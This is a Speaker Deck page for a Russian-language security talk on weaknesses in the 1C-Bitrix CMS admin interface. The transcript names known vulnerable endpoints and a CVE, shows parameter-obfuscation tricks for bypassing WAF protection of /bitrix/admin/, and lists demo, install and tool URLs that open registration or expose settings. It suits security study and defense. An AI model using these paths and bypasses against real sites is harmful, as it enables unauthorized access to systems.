Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Выйди и зайди нормально
Search
Bo0oM
September 13, 2023
Programming
0
71
Выйди и зайди нормально
О некоторых особенностях административного интерфейса CMS 1С-Битрикс
Bo0oM
September 13, 2023
Tweet
Share
More Decks by Bo0oM
See All by Bo0oM
Носок на сок
bo0om
0
1.7k
Защита от вредоносной автоматизации сегодня
bo0om
0
580
Defending against automatization using nginx
bo0om
0
820
Antibot pitch deck
bo0om
0
140
31337
bo0om
0
170
Your back is white
bo0om
0
350
FTP2RCE
bo0om
1
7.5k
Interpret it!
bo0om
0
1.1k
At Home Among Strangers
bo0om
1
3.9k
Other Decks in Programming
See All in Programming
CDK引数設計道場100本ノック
badmintoncryer
2
570
テスターからテストエンジニアへ ~新米テストエンジニアが歩んだ9ヶ月振り返り~
non0113
2
240
AWS Summit Japan 2024と2025の比較/はじめてのKiro、今あなたは岐路に立つ
satoshi256kbyte
1
250
SwiftでMCPサーバーを作ろう!
giginet
PRO
2
200
Workers を定期実行する方法は一つじゃない
rokuosan
0
130
NEWT Backend Evolution
xpromx
1
150
DMMを支える決済基盤の技術的負債にどう立ち向かうか / Addressing Technical Debt in Payment Infrastructure
yoshiyoshifujii
4
630
SQLアンチパターン第2版 データベースプログラミングで陥りがちな失敗とその対策 / Intro to SQL Antipatterns 2nd
twada
PRO
32
8.7k
MCPを使ってイベントソーシングのAIコーディングを効率化する / Streamlining Event Sourcing AI Coding with MCP
tomohisa
0
190
状態遷移図を書こう / Sequence Chart vs State Diagram
orgachem
PRO
3
260
0から始めるモジュラーモノリス-クリーンなモノリスを目指して
sushi0120
0
140
AIコーディングエージェント全社導入とセキュリティ対策
hikaruegashira
14
7.9k
Featured
See All Featured
Templates, Plugins, & Blocks: Oh My! Creating the theme that thinks of everything
marktimemedia
31
2.4k
Agile that works and the tools we love
rasmusluckow
329
21k
Raft: Consensus for Rubyists
vanstee
140
7k
For a Future-Friendly Web
brad_frost
179
9.8k
Facilitating Awesome Meetings
lara
54
6.5k
The Art of Delivering Value - GDevCon NA Keynote
reverentgeek
15
1.6k
A Modern Web Designer's Workflow
chriscoyier
695
190k
Why You Should Never Use an ORM
jnunemaker
PRO
58
9.5k
Balancing Empowerment & Direction
lara
1
500
Understanding Cognitive Biases in Performance Measurement
bluesmoon
29
1.8k
How to Ace a Technical Interview
jacobian
278
23k
The MySQL Ecosystem @ GitHub 2015
samlambert
251
13k
Transcript
«Выйди и зайди нормально!» Anton Lopanitsyn
КТО Я? • Тыкаю кавычки (атакую). • Запрещаю тыкать кавычки
(защищаю). • Пытаюсь в стартапы по ИБ (passleak.com, antibot.ru) – но нехватает денюшков • Исследую, развлекаюсь, рассказываю об этом Bo0oM
Как обычно ломают Bitrix? • restore.php Система восстановления файлов в
Bitrix • vote/uf.php CVE-2022-27228 • html_editor_action.php CVE-???, вроде ту же самую дали ей)))0) • уязвимости в самописных модулях не покрытых waf’ом Ну тут как будто без комментариев
Исправления
Исправления
None
Обходим первые защиты
SEF_APPLICATION_CUR_PAGE_URL /pewpew/?SEF_APPLICATION_CUR_PAGE_URL=/bitrix/admin/
SEF_APPLICATION_CUR_PAGE_URL /pewpew/?SEF_APPLICATION_CUR_PAGE_URL=/bitrix/admin/ /pewpew/?SEF%20APPLICATION%20CUR%20PAGE_URL=/bitrix/admin/ /pewpew/?SEF+APPLICATION%20CUR+PAGE[URL=/bitrix/admin/
None
None
None
/auth/?register=yes
/crm/?register=yes
/auth/oauth2/?register=yes
Demo /bitrix/wizards/bitrix/demo/public_files/ru/auth/index.php?register=yes /bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/c ustom-registration/index.php /bitrix/wizards/bitrix/demo/modules/examples/public/language/ru/examples/ my-components/news_list.php?register=yes /bitrix/wizards/bitrix/demo/modules/subscribe/public/personal/subscribe/subs cr_edit.php?register=YES&sf_EMAIL=
Demo
Demo
Install /bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/ public/ru/personal/profile/index.php?register=yes /bitrix/modules/bitrix.siteinfoportal/install/wizards/bitrix/infoportal/site/ public/ru/board/my/index.php?register=yes /bitrix/modules/forum/install/admin/forum_index.php
Install
None
Даже если взять и попасть в админку не удалось •
Можно почитать отзывы и обратную связь • Посмотреть списки рассылок • Собрать используемые плагины изнутри • Посмотреть настройки • Побрутить пароли • Собрать дополнительную информацию
Tools /bitrix/tools/catalog_export/yandex_detail.php /bitrix/tools/sale/discount_reindex.php /bitrix/tools/sale/basket_discount_convert.php
Tools
Tools /bitrix/tools/catalog/iblock_catalog_list.php?SHOWALL_1=1
Components /bitrix/components/bitrix/desktop/admin_settings.php /bitrix/components/bitrix/player/player_playlist_edit.php /bitrix/components/bitrix/map.yandex.search/settings/settings.php
Tools /bitrix/tools/bizproc_get_html_editor.php
/bitrix/modules/subscribe/public/subscr_edit.php
smtp
None
None
Никто не знает, что тут
bo0om
badmintoncryer
non0113
satoshi256kbyte
giginet
rokuosan
xpromx
yoshiyoshifujii
twada
tomohisa
orgachem
sushi0120
hikaruegashira
marktimemedia
rasmusluckow
vanstee
brad_frost
lara
reverentgeek
chriscoyier
jnunemaker
bluesmoon
jacobian
samlambert
